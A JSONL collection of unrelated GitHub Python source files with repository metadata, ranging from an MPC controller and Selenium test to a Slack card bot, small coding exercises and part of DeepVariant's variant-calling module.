ref_y)@(self.y_casadi[k] - ref_y).T\n            \n            ref_u1 = 0\n            ref_u2 = 0\n\n            input_use += self.R*(self.U_casadi[0,k] - ref_u1)@(self.U_casadi[0,k] - ref_u1).T \n            input_use += self.R*(self.U_casadi[1,k] - ref_u2)@(self.U_casadi[1,k] - ref_u2).T \n            \n        \n        # Last step N horizon -----------------------------------------------------------------------\n        ref_x = self.reference_x[self.N]\n        ref_y = self.reference_y[self.N]\n        
pose_error += self.Q_pos*(self.x_casadi[self.N] - ref_x)@(self.x_casadi[self.N] - ref_x).T\n pose_error += self.Q_pos*(self.y_casadi[self.N] - ref_y)@(self.y_casadi[self.N] - ref_y).T\n \n self.opti.minimize(pose_error + input_use)\n\n\n def compute_control(self, initial_state, reference_x, reference_y):\n \"\"\"Compute the control actions\n Args:\n initial_state (np.array): actual state of the robot\n reference_x (np.array): x reference for the robot\n reference_y (np.array): y reference for the robot\n Returns:\n (np.array): control actions\n \"\"\"\n\n # Setting Initial State ---------------------------------------\n start_time = time.time()\n self.opti.set_value(self.x_0, initial_state[0])\n self.opti.set_value(self.y_0, initial_state[1])\n \n # Setting Reference ------------------------------------------ \n self.opti.set_value(self.reference_x, reference_x)\n self.opti.set_value(self.reference_y, reference_y)\n \n # Compute solution ---------------------------------------\n start_time = time.time()\n sol = self.opti.solve()\n \n # Taking just first action ---------------------------------------\n u1_io = sol.value(self.U_casadi)[0]\n u2_io = sol.value(self.U_casadi)[1]\n\n state_yaw = initial_state[2]\n v = math.cos(state_yaw)*u1_io + math.sin(state_yaw)*u2_io\n w = (-math.sin(state_yaw)*u1_io/self.b) + (math.cos(state_yaw)*u2_io/self.b)\n\n\n return v[0], w[0]","repo_name":"giulioturrisi/Differential-Drive-Robot","sub_path":"python_scripts/controllers/io_linearization_mpc.py","file_name":"io_linearization_mpc.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"2712197241","text":"#Embedded file name: arch/win32/photouploader/helpers.py\nfrom comtypes import COMError\nfrom dropbox.camera import PhotoImportDisconnected\nfrom dropbox.camera.util import is_apple_device\nfrom dropbox.functions import convert_to_twos_complement\nfrom dropbox.trace import TRACE, report_bad_assumption\nfrom pynt.constants import COM_ERROR_BUSY, COM_ERROR_DEVICE_NOT_CONNECTED, COM_ERROR_FILE_NOT_FOUND, COM_ERROR_GEN_FAILURE, COM_ERROR_NOT_FOUND, COM_ERROR_OPERATION_ABORTED, COM_ERROR_SEM_TIMEOUT, E_FAIL, E_WPD_DEVICE_IS_HUNG, E_WPD_DEVICE_NOT_OPEN, WIA_ERROR_BUSY, WIA_ERROR_OFFLINE\nDISCONNECTED_ERRORS = set([COM_ERROR_BUSY,\n COM_ERROR_DEVICE_NOT_CONNECTED,\n COM_ERROR_FILE_NOT_FOUND,\n COM_ERROR_GEN_FAILURE,\n COM_ERROR_NOT_FOUND,\n COM_ERROR_OPERATION_ABORTED,\n COM_ERROR_SEM_TIMEOUT,\n E_FAIL,\n E_WPD_DEVICE_IS_HUNG,\n E_WPD_DEVICE_NOT_OPEN,\n WIA_ERROR_BUSY,\n WIA_ERROR_OFFLINE])\nMAX_DISCONNECTED_ERRORS = 5\n\ndef handle_device_disconnect_exceptions(device, exc):\n if is_disconnected_error(exc):\n try:\n device.num_disconnected_errors += 1\n except AttributeError:\n device.num_disconnected_errors = 1\n\n TRACE('Caught a potential disconnected error')\n if is_apple_device(device) and exc.hresult == E_WPD_DEVICE_IS_HUNG:\n report_bad_assumption('Transfer interrupted due to iTunes backup!')\n if device.num_disconnected_errors >= MAX_DISCONNECTED_ERRORS:\n TRACE('!! Too many disconnected errors. 
Raising PhotoImportDisconnected')\n            device.disconnected = True\n            raise PhotoImportDisconnected()\n        return True\n    if isinstance(exc, PhotoImportDisconnected):\n        raise exc\n\n\ndef is_disconnected_error(exc):\n    if isinstance(exc, COMError) and convert_to_twos_complement(exc.hresult) in DISCONNECTED_ERRORS:\n        return True\n    return False\n","repo_name":"bizonix/DropBoxLibrarySRC","sub_path":"pyc_decrypted/latest/arch/win32/photouploader/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"}
+{"seq_id":"11815646880","text":"import socket, os, time\nfrom threading import Thread\nimport cursor\n\n\nSEPARATOR = \"\"\nBUFFER_SIZE = 4096 # send 4096 bytes each time step\n\n# the ip address or hostname of the server, the receiver\nSERVER_HOST = \"192.168.121.128\"\nSERVER_PORT = 5020\n\nSCREEN_HOST = \"192.168.121.128\"\nSCREEN_PORT = 5024\n\n\n# create the client socket\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((SCREEN_HOST, SCREEN_PORT))\n\n\n#print(f\"[+] Connecting to {SERVER_HOST}:{SERVER_PORT}\")\n#s.connect((SERVER_HOST, SERVER_PORT))\n#print(\"[+] Connected.\")\n\n\n#print(\"[@] Enter Your User Name(Nickname): \")\n#USER = input(\"[@] Enter Your User Name(Nickname): \")\n#USER += \"ŒSEPŒ\"\n#s.sendto(USER.encode('utf-8'), (host, port))\n\ndata, addr = s.recvfrom(1024)\nRCV = data.decode('utf-8')\n\ncursor.delete_last_line()\nprint(f\"[@] Enter Your User Name(Nickname): {RCV[:-5]}\")\n\n#s.send(f\"{filename}{SEPARATOR}{filesize}\".encode())\nwhile True:\n\tdata, addr = s.recvfrom(1024)\n\tRCV = data.decode('utf-8')\n\ttry:\n\t\tDATA = RCV.split('ŒSEPŒ') # split the decoded string, not the raw bytes\n\texcept:\n\t\tpass\n\n\tif 'ŒEXITŒ' in DATA[0]:\n\t\tprint(\"[+] Disconnected.\")\n\t\tbreak\n\telif len(DATA) == 2:\n\t\tprint(f\"{DATA[1]}: {DATA[0]}\")\n\telif len(DATA) == 1:\n\t\tprint(DATA)\n\t\ns.close()\n","repo_name":"kjh-icnl/CHATTER","sub_path":"chat-screen.py","file_name":"chat-screen.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"42536307685","text":"f = open(\"input5.txt\",\"r\")\npath = []\nfor line in f:\n    path.append(line[:-1])\npath = [int(x) for x in path]\n\n#part 2\ndef loopedList2(numberList):\n    steps = 0\n    i = 0\n    while True:\n        try:\n            jump = numberList[i]\n            if jump >= 3:\n                numberList[i] -= 1\n            else:\n                numberList[i] += 1\n            i += jump\n            steps += 1\n        except IndexError:\n            return steps\n\t\t\t\nprint(loopedList2(path))","repo_name":"jgoodbody/Advent_of_Code_2017","sub_path":"day5/day5p2.py","file_name":"day5p2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"11391605979","text":"import time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\n\ndef test_positive(app):\n    # Add three products to the cart\n    for _ in range(3):\n        app.wd.get(\"https://litecart.stqa.ru/ru/\")\n\n        app.wd.find_elements_by_css_selector(\"div#box-most-popular li.product\")[0].click()\n\n        quantity = app.wd.find_element_by_css_selector(\"span.quantity\")\n        quantity_text = quantity.text\n        app.wd.find_element_by_css_selector(\"button[name=add_cart_product]\").click()\n        wait = WebDriverWait(app.wd, 10)\n        wait.until_not(lambda d: d.find_element_by_css_selector(\"span.quantity\").text == quantity_text)\n\n    # 
Click the 'Checkout' link\n    app.wd.find_element_by_xpath(\"//a[text()='Checkout »']\").click()\n    shortcuts_num = len(app.wd.find_elements_by_css_selector(\"li.shortcut\"))\n\n    if shortcuts_num == 0:\n        items_num = 1\n    else:\n        items_num = shortcuts_num\n\n    # Wait for the cart page to load\n    wait = WebDriverWait(app.wd, 10)\n    wait.until(ec.visibility_of_element_located((By.CSS_SELECTOR, \"div#order_confirmation-wrapper table\")))\n    time.sleep(1)\n\n    # Remove all products from the cart\n    for _ in range(items_num):\n        if len(app.wd.find_elements_by_css_selector(\"li.shortcut\")) > 0:\n            app.wd.find_elements_by_css_selector(\"li.shortcut\")[0].click()\n\n        table = app.wd.find_element_by_css_selector(\"div#order_confirmation-wrapper table\")\n\n        app.wd.find_elements_by_css_selector(\"button[name=remove_cart_item]\")[0].click()\n\n        wait = WebDriverWait(app.wd, 10)\n        wait.until(ec.staleness_of(table))\n","repo_name":"dmsabel/selenium_complete_guide","sub_path":"tests/lec7/test_cart.py","file_name":"test_cart.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"2751476687","text":"# TestPySide.py\nimport sys\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\n# Define Form\nclass Form(QDialog):\n    def __init__(self,parent=None):\n        super(Form,self).__init__(parent)\n        self.setWindowTitle('Test Form') \n\n# Main function\nif __name__=='__main__':\n\n    # Create Qt App\n    app=QApplication(sys.argv)\n\n    # Create window\n    NewForm=Form()\n    NewForm.show()\n\n    # exit\n    sys.exit(app.exec_())\n","repo_name":"mrtigercn/myapp","sub_path":"gui/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"10429161571","text":"from transformers import AutoTokenizer, AutoModel, FeatureExtractionPipeline\nfrom datasets import load_dataset\nfrom transformers.pipelines.pt_utils import KeyDataset\nimport pandas as pd\nimport torch\nimport numpy as np\nimport argparse\nfrom tqdm.auto import tqdm\nimport sys\nsys.path.insert(0, '.')\nimport altair as alt\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--output_file', default='./data/test/data.csv')\nparser.add_argument('--model', default='bert-base-cased')\nparser.add_argument('--tokenizer', default='bert-base-cased')\n\nif __name__ == \"__main__\":\n    args = parser.parse_args()\n    \n    cuda_available = torch.cuda.is_available()\n    device = 0 if cuda_available else -1\n    \n    tokenizer = AutoTokenizer.from_pretrained(args.tokenizer) \n    model = AutoModel.from_pretrained(args.model)\n\n    dataset = load_dataset(\"tweet_eval\", \"sentiment\")\n    dataset = dataset[\"test\"]\n    \n    dataset = dataset.shuffle(seed=14).select(range(600))\n\n    # get embeddings from sentence tokens\n    distances_cls = []\n    distances_avg = []\n    distances_tokens = []\n    \n    pipe = FeatureExtractionPipeline(model, tokenizer, framework=\"pt\", return_tensors=True, device=device)\n    for embed in tqdm(pipe(KeyDataset(dataset, \"text\"), batch_size=32), total=len(dataset)):\n        cls_embed = embed[:, 0, :].detach().numpy()\n        word_embed = embed[:, 1:, :].squeeze(0).detach().numpy()\n        # using inner product distance\n        # and also cosine similarity\n        # get the distances between the [CLS] token and the other tokens\n        distances_cls += [np.inner(cls_embed, word_embed[i]) for i in range(word_embed.shape[0])]\n        distances_cls += [np.inner(cls_embed, word_embed[i]) / (np.linalg.norm(cls_embed) * 
np.linalg.norm(word_embed[i])) for i in range(word_embed.shape[0])]\n        # get the distances between the average of the tokens and the other tokens\n        distances_avg += [np.inner(np.average(word_embed, axis=0), word_embed[i]) for i in range(word_embed.shape[0])]\n        distances_avg += [np.inner(np.average(word_embed, axis=0), word_embed[i]) / (np.linalg.norm(np.average(word_embed, axis=0)) * np.linalg.norm(word_embed[i])) for i in range(word_embed.shape[0])]\n        # get the distances between the tokens\n        distances_tokens += [np.inner(word_embed[i], word_embed[j]) for i in range(word_embed.shape[0]) for j in range(word_embed.shape[0]) if i != j]\n        distances_tokens += [np.inner(word_embed[i], word_embed[j]) / (np.linalg.norm(word_embed[i]) * np.linalg.norm(word_embed[j])) for i in range(word_embed.shape[0]) for j in range(word_embed.shape[0]) if i != j]\n    \n    # plot the distribution of the distances to cls token\n    df = pd.DataFrame({\"distances_cls\": distances_cls})\n    # get the first element of every list\n    df[\"distances_cls\"] = df[\"distances_cls\"].apply(lambda x: x[0])\n    df[\"distances_cls\"] = pd.cut(df[\"distances_cls\"], bins=100)\n    df = df.groupby(\"distances_cls\").size().reset_index(name=\"count\")\n    df[\"distances_cls\"] = df[\"distances_cls\"].astype(str)\n    chart1 = alt.Chart(df).mark_bar().encode(\n        x=alt.X(\"distances_cls\", title=\"Distance to [CLS] token\"),\n        y=alt.Y(\"count\", title=\"Count\"),\n    ).properties(\n        width=300,\n        height=300,\n        title=\"Distribution of distances to [CLS] token\"\n    )\n    \n    # plot the distribution of the distances to average token\n    df = pd.DataFrame({\"distances_avg\": distances_avg})\n    df[\"distances_avg\"] = pd.cut(df[\"distances_avg\"], bins=100)\n    df = df.groupby(\"distances_avg\").size().reset_index(name=\"count\")\n    df[\"distances_avg\"] = df[\"distances_avg\"].astype(str)\n    chart2 = alt.Chart(df).mark_bar().encode(\n        x=alt.X(\"distances_avg\", title=\"Distance to average token\"),\n        y=alt.Y(\"count\", title=\"Count\"),\n    ).properties(\n        width=300,\n        height=300,\n        title=\"Distribution of distances to average token\"\n    )\n\n    # plot the distribution of the distances between tokens\n    df = pd.DataFrame({\"distances_tokens\": distances_tokens})\n    df[\"distances_tokens\"] = pd.cut(df[\"distances_tokens\"], bins=100)\n    df = df.groupby(\"distances_tokens\").size().reset_index(name=\"count\")\n    df[\"distances_tokens\"] = df[\"distances_tokens\"].astype(str)\n    chart3 = alt.Chart(df).mark_bar().encode(\n        x=alt.X(\"distances_tokens\", title=\"Distance between tokens\"),\n        y=alt.Y(\"count\", title=\"Count\"),\n    ).properties(\n        width=300,\n        height=300,\n        title=\"Distribution of distances between tokens\"\n    )\n\n    chart = chart1 | chart2 | chart3\n    chart.save(args.output_file)","repo_name":"CarlOwOs/text-nnk","sub_path":"src/visualization/BERT-embedding-comparison.py","file_name":"BERT-embedding-comparison.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"72971765691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 21 23:07:12 2021\n\n@author: Seo\n\"\"\"\n\nimport os\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\n\ndirpath = \"F:/PycharmProjects/calculator-impact-labelled\"\n\nfilenames = os.listdir(dirpath)\nimgfilenames = [i for i in filenames if '.png' in i]\ntxtfilenames = [i for i in filenames if '.txt' in i]\nrelabel = False\n\nfor i in range(len(imgfilenames)):\n    \n    # index into imgfilenames, not filenames, so the .txt files are skipped\n    imgfilepath = os.path.join(dirpath, imgfilenames[i])\n    
print(\"Loading %s\" % (imgfilepath))\n txtfilename = os.path.splitext(filenames[i])[0]+\".txt\"\n if txtfilename in txtfilenames and relabel is False:\n print(\"Already labelled, skipping\")\n continue\n \n img = imread(imgfilepath)\n imgcols = img.shape[1]\n imgslice = img[:,int(2/3*imgcols):,:]\n \n plt.figure(1, figsize=(5,9))\n plt.ion()\n plt.clf()\n plt.imshow(imgslice)\n plt.show(block=False)\n \n instr = input()\n if instr == \"exit\":\n break\n \n # save input\n txtfilepath = os.path.join(dirpath, txtfilename)\n with open(txtfilepath, \"w\") as fp:\n fp.write(instr)\n print(\"Wrote to %s\" % (txtfilepath))\n ","repo_name":"icyveins7/calculator-impact","sub_path":"app/scripts/labeller.py","file_name":"labeller.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37254842322","text":"import os\nimport slack\nimport json\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom swdestinybot.models import Card\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\nimport re\nfrom ..services import card_service\nfrom urllib.parse import unquote\n\nclients = {}\n\n@csrf_exempt\ndef handle_slack_message(request):\n payload = json.loads(request.body)\n if payload['type'] == \"url_verification\":\n return JsonResponse({ \"challenge\" : payload['challenge']})\n elif payload['type'] == \"event_callback\":\n return send_message(payload['event'])\n\n@csrf_exempt\ndef handle_message_action(request):\n if request.method == 'POST':\n action = json.loads(request.POST.get('payload'))\n if action['type'] == \"block_actions\":\n cardId = action['actions'][0]['value']\n matchedCard = card_service.get_card_by_id(int(cardId))\n if matchedCard != None:\n getClient(action['team']['id']).chat_postMessage(\n channel='#swdestiny',\n text=matchedCard['name'] + '\\n' + matchedCard['image_url'] + '\\nFull details: https://swdestinydb.com/card/' + matchedCard['code'],\n blocks=buildCardResponse(matchedCard),\n unfurl_links=False)\n return HttpResponse(\"Ok\")\n\ndef send_message(event):\n if 'username' not in event and event['type'] == 'message' and 'text' in event:\n text = event['text']\n pattern = re.compile(\"\\[\\[(.*)\\]\\]\")\n match = pattern.search(text)\n if match:\n card = match.group(1)\n matchedCards = card_service.get_cards_by_name(card)\n\n if len(matchedCards) == 1:\n getClient(event['team']).chat_postMessage(\n channel='#swdestiny',\n text=matchedCards[0]['name'] + '\\n' + matchedCards[0]['image_url'] + '\\nFull details: https://swdestinydb.com/card/' + matchedCards[0]['code'],\n blocks=buildCardResponse(matchedCards[0]),\n unfurl_links=False)\n elif len(matchedCards) > 1:\n getClient(event['team']).chat_postMessage(\n channel='#swdestiny',\n text='Multiple cards found for ' + card,\n blocks=buildMultipleResponse(card, matchedCards))\n else:\n getClient(event['team']).chat_postMessage(\n channel='#swdestiny',\n text='No card found for ' + card)\n return HttpResponse(\"Ok\")\n\ndef buildCardResponse(matchedCard):\n return [\n {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"*\" + matchedCard['name'] + \" (\" + matchedCard['set_name'] + \"|\" + str(matchedCard['set_number']) + \")\" + \"*\"\n\t\t\t}\n },\n {\n \"type\": \"image\",\n \"block_id\": \"image1\",\n \"image_url\": matchedCard['image_url'],\n \"alt_text\": matchedCard['name']\n },\n {\n\t\t\t\"type\": 
    return [\n        {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"*\" + matchedCard['name'] + \" (\" + matchedCard['set_name'] + \"|\" + str(matchedCard['set_number']) + \")\" + \"*\"\n\t\t\t}\n        },\n        {\n            \"type\": \"image\",\n            \"block_id\": \"image1\",\n            \"image_url\": matchedCard['image_url'],\n            \"alt_text\": matchedCard['name']\n        },\n        {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"\"\n\t\t\t}\n        }\n    ]\n\ndef buildMultipleResponse(cardName, matchedCards):\n    blocks = [\n        {\n\t\t\t\"type\": \"section\",\n\t\t\t\"text\": {\n\t\t\t\t\"type\": \"mrkdwn\",\n\t\t\t\t\"text\": \"Multiple cards found for *\" + cardName + \"*\"\n\t\t\t}\n        },\n        {\"type\": \"actions\"}\n    ]\n    elements = []\n    for card in matchedCards:\n        elements.append({\n            \"type\": \"button\",\n            \"text\": {\n                \"type\": \"plain_text\",\n                \"text\": card['name'] + \" (\" + card['set_name'] + \"|\" + str(card['set_number']) + \")\"\n            },\n            \"value\": card['code'],\n            \"action_id\": card['code']\n        })\n    blocks[1]['elements'] = elements\n    return blocks\n\ndef getClient(teamId):\n    if teamId not in clients:\n        token = settings.SLACK_TOKENS[teamId]\n        clients[teamId] = slack.WebClient(token)\n\n    return clients[teamId]","repo_name":"snuffylookingnerfherder/swdestinybot","sub_path":"swdestinybot/views/slack_view.py","file_name":"slack_view.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"3512649842","text":"\r\nransomNote = \"aa\" \r\nmagazine = \"aab\"\r\n\r\n#ransomNote = \"a\" \r\n#magazine = \"b\"\r\n\r\n#ransomNote = \"aa\" \r\n#magazine = \"ab\"\r\n\r\n#ransomNote = \"aaasas\" \r\n#magazine = \"ab\"\r\n\r\n#ransomNote = \"aab\"\r\n#magazine = \"baa\"\r\n\r\nlst1 = []\r\nindex1 = 0\r\nlstindex = []\r\n\r\nlstran = list(map(str,str(ransomNote)))\r\nlstmag = list(map(str,str(magazine)))\r\n\r\n# each magazine letter may be used at most once, so pop it once it is matched\r\nfor x in range(0,len(lstran)):\r\n    if lstran[x] in lstmag:\r\n        index1 = lstmag.index(lstran[x])\r\n        print(index1 , 'index1')\r\n        lstmag.pop(index1)\r\n        lstindex.append(index1)\r\n        print(lstindex)\r\n        lst1.append(lstran[x])\r\n        print(lst1)\r\n\r\nj1 = \"\".join(lst1)\r\n\r\nif j1 == ransomNote:\r\n    print(True)\r\nelse:\r\n    print(False)\r\n\r\n\r\n\r\n\r\n","repo_name":"kartik03091991/Leetcode","sub_path":"ransomNote_Leet.py","file_name":"ransomNote_Leet.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"17350590753","text":"def temperaturas():\n    n = int(input(\"n: \"))\n    temperatura = []\n    cont = 0\n    for i in range(n):\n        temperatura.append(float(input(\"temperature in °C: \")))\n    media = sum(temperatura)/n\n    print(\"The average temperature is: %.1f\" % media)\n    for j in temperatura:\n        if j < media:\n            cont = cont + 1\n    print(temperatura)\n    print(\"The temperature was below the average on %d days\" % cont)\n\n\nif __name__ == '__main__':\n    temperaturas()\n","repo_name":"matheustxaguiar/Programming-Period-2","sub_path":"Lists/exercicio12.py","file_name":"exercicio12.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"28087074899","text":"import gradio as gr\n\nfrom .pipeline import text2image_ui, image2image_ui\nfrom .process import process_ui\nfrom .hub import model_manager_ui\n\n\ndef ui(proxy=None):\n    css = \"\"\".gr-small-button {\n        max-width: 1.5em !important;\n        min-width: 1.5em !important;\n        color: #464646 !important;\n    }\n    \"\"\"\n    with gr.Blocks(title=\"ArtCraft\", css=css) as block:\n        with gr.Tabs() as tabs:\n            with gr.TabItem(\"text2image\", id=1):\n                _, tab1_output, tab1_ops = text2image_ui([\"image2image\", \"process\"])\n            with gr.TabItem(\"image2image\", id=2):\n                tab2_input, tab2_output, tab2_ops = 
image2image_ui([\"image2image\", \"process\"])\n with gr.TabItem(\"process\", id=3):\n tab3_input, tab3_output, tab3_ops = process_ui(\"artcraft.processors\", [\"image2image\", \"process\"])\n with gr.TabItem(\"models\", id=4):\n model_manager_ui(proxy=proxy)\n\n tab1_ops[0].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=2)), [tab1_output], [tab2_input, tabs])\n tab1_ops[1].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=3)), [tab1_output], [tab3_input, tabs])\n\n tab2_ops[0].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=2)), [tab2_output], [tab2_input, tabs])\n tab2_ops[1].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=3)), [tab2_output], [tab3_input, tabs])\n\n tab3_ops[0].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=2)), [tab3_output], [tab2_input, tabs])\n tab3_ops[1].click(lambda x: (gr.update(value=x), gr.Tabs.update(selected=3)), [tab3_output], [tab3_input, tabs])\n\n return block\n\n\ndef launch():\n ui().launch()\n","repo_name":"yinyajun/artcraft","sub_path":"artcraft/ui/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39031062699","text":"# Maximum Depth of Binary Tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n \n # max depth variable to track\n maxdepth = 1\n \n def maxDepth(self, root: Optional[TreeNode]) -> int:\n \n # if no root exists return 0\n if root is None:\n return 0\n \n def dfs(self, depth, root):\n \n # check for a new max depth\n self.maxdepth = max(self.maxdepth, depth)\n \n # if node children exist, continue iteration with depth + 1\n if root.left is not None:\n dfs(self, depth + 1, root.left)\n if root.right is not None:\n dfs(self, depth + 1, root.right)\n \n dfs(self, 1, root)\n \n return self.maxdepth","repo_name":"Steve-3PO/Leetcode","sub_path":"104.py","file_name":"104.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70124741053","text":"import json\nimport os\nimport time\n\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport numpy as np\nimport tensorflow as tf\n\nfrom deepvariant import dv_utils\nfrom deepvariant import keras_modeling as modeling\nfrom deepvariant import logging_level\nfrom deepvariant.protos import deepvariant_pb2\nfrom third_party.nucleus.io import sharded_file_utils\nfrom third_party.nucleus.io import tfrecord\nfrom third_party.nucleus.protos import variants_pb2\nfrom third_party.nucleus.util import errors\nfrom third_party.nucleus.util import proto_utils\nfrom third_party.nucleus.util import variant_utils\n\n_ALLOW_EXECUTION_HARDWARE = [\n 'auto', # Default, no validation.\n 'cpu', # Don't use accelerators, even if available.\n 'accelerator', # Must be hardware acceleration or an error will be raised.\n]\n\n# The number of digits past the decimal point that genotype likelihoods are\n# rounded to, for numerical stability.\n_GL_PRECISION = 10\n\n# This number is estimated by the following logic:\n# For a sample with 10,000,000 examples, if we log every 50,000 examples,\n# there will be 200 lines per sample.\n_LOG_EVERY_N = 50000\n\n_LOG_EVERY_N_BATCHES = 100\n\n_DEFAULT_INPUT_READ_THREADS = 32\n_DEFAULT_PREFETCH_BUFFER_BYTES = 16 * 1000 * 1000\n\nFLAGS = 
flags.FLAGS\n\nflags.DEFINE_string(\n 'examples', None,\n 'Required. tf.Example protos containing DeepVariant candidate variants in '\n 'TFRecord format, as emitted by make_examples. Can be a comma-separated '\n 'list of files, and the file names can contain wildcard characters.')\nflags.DEFINE_string(\n 'outfile', None,\n 'Required. Destination path where we will write output candidate variants '\n 'with additional likelihood information in TFRecord format of '\n 'CallVariantsOutput protos.')\nflags.DEFINE_string(\n 'checkpoint', None,\n 'Required. Path to the TensorFlow model checkpoint to use to evaluate '\n 'candidate variant calls.')\nflags.DEFINE_integer(\n 'batch_size', 512,\n 'Number of candidate variant tensors to batch together during inference. '\n 'Larger batches use more memory but are more computational efficient.')\nflags.DEFINE_integer('max_batches', None,\n 'Max. batches to evaluate. Defaults to all.')\nflags.DEFINE_integer('num_readers', 8,\n 'Number of parallel readers to create for examples.')\nflags.DEFINE_boolean('include_debug_info', False,\n 'If true, include extra debug info in the output.')\nflags.DEFINE_boolean(\n 'debugging_true_label_mode', False,\n 'If true, read the true labels from examples and add to '\n 'output. Note that the program will crash if the input '\n 'examples do not have the label field. '\n 'When true, this will also fill everything when '\n '--include_debug_info is set to true.')\nflags.DEFINE_string(\n 'execution_hardware', 'auto',\n 'When in cpu mode, call_variants will not place any ops on the GPU, even '\n 'if one is available. In accelerator mode call_variants validates that at '\n 'least some hardware accelerator (GPU/TPU) was available for us. This '\n 'option is primarily for QA purposes to allow users to validate their '\n 'accelerator environment is correctly configured. In auto mode, the '\n 'default, op placement is entirely left up to TensorFlow. In tpu mode, '\n 'use and require TPU.')\nflags.DEFINE_string(\n 'config_string', None,\n 'String representation of a tf.ConfigProto message, with comma-separated '\n 'key: value pairs, such as \"allow_soft_placement: True\". The value can '\n 'itself be another message, such as '\n '\"gpu_options: {per_process_gpu_memory_fraction: 0.5}\".')\nflags.DEFINE_string(\n 'kmp_blocktime', '0',\n 'Value to set the KMP_BLOCKTIME environment variable to for efficient MKL '\n 'inference. See https://www.tensorflow.org/performance/performance_guide '\n 'for more information. The default value is 0, which provides the best '\n 'performance in our tests. Set this flag to \"\" to not set the variable.')\n_LIMIT = flags.DEFINE_integer(\n 'limit', 0, 'If set to > 0, limit processing to <= limit '\n 'examples.')\n\n\nclass ExecutionHardwareError(Exception):\n pass\n\n\nclass CustomCallback(tf.keras.callbacks.Callback):\n \"\"\"Custom callbacks for `predict`.\"\"\"\n\n def on_predict_batch_begin(self, batch, logs=None):\n logging.log_every_n(logging.INFO, 'Begin `predict` on batch %d.',\n _LOG_EVERY_N_BATCHES, batch)\n\n def on_predict_batch_end(self, batch, logs=None):\n logging.log_every_n(logging.INFO, 'End `predict` on batch %d.',\n _LOG_EVERY_N_BATCHES, batch)\n\n\ndef round_gls(gls, precision=None):\n \"\"\"Returns genotype likelihoods rounded to the desired precision level.\n\n Args:\n gls: A list of floats. The input genotype likelihoods at any precision.\n precision: Positive int. The number of places past the decimal point to\n round to. 
If None, no rounding is performed.\n\n Returns:\n A list of floats rounded to the desired precision.\n\n Raises:\n ValueError: The input gls do not sum to nearly 1.\n \"\"\"\n if abs(sum(gls) - 1) > 1e-6:\n raise ValueError(\n 'Invalid genotype likelihoods do not sum to one: sum({}) = {}'.format(\n gls, sum(gls)))\n if precision is None:\n return gls\n\n min_ix = 0\n min_gl = gls[0]\n for ix, gl in enumerate(gls):\n if gl < min_gl:\n min_gl = gl\n min_ix = ix\n\n rounded_gls = [round(gl, precision) for gl in gls]\n rounded_gls[min_ix] = max(\n 0.0,\n round(1 - sum(rounded_gls[:min_ix] + rounded_gls[min_ix + 1:]),\n precision))\n return rounded_gls\n\n\ndef write_variant_call(writer, prediction):\n \"\"\"Write the variant call based on prediction.\n\n Args:\n writer: A object with a write() function that will be called for each\n encoded_variant and genotype likelihoods.\n prediction: A [3] tensor of floats. These are the predicted genotype\n likelihoods (p00, p0x, pxx) for some alt allele x, in the same order as\n encoded_variants.\n\n Returns:\n The return status from writer.\n \"\"\"\n encoded_variant = prediction['variant']\n encoded_alt_allele_indices = 